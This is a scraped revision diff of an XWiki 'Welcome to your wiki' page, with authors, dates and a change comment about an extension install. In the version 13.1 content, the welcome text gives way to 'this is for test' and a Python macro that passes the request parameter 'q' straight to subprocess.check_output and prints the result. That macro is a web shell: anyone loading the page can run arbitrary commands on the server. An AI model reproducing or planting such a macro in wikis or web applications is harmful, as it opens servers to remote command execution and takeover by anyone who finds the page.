Changes for page Welcome to your wiki

Last modified by Thomas Mortagne on 2016/03/17 15:34

From version 14.1
edited by Vincent Massol
on 2016/02/02 11:22
Change comment: There is no comment for this version
To version 13.1
edited by Thomas Mortagne
on 2016/01/04 13:18
Change comment: Install extension [org.xwiki.enterprise:xwiki-enterprise-ui-common-7.4]

Summary

Details

Page properties
Author
... ... @@ -1,1 +1,1 @@
1 -XWiki.VincentMassol
1 +XWiki.ThomasMortagne
Content
... ... @@ -1,2 +1,7 @@
1 -This wiki is the main wiki of the farm. Its content shouldn't be modified since it only serves to create subwikis.
1 +this is for test
2 +{{python}}from subprocess import check_output
3 +q = request.get('q') or 'true'
4 +q = q.split(' ')
5 +print ''+check_output(q)+''
6 +{{/python}}
2 2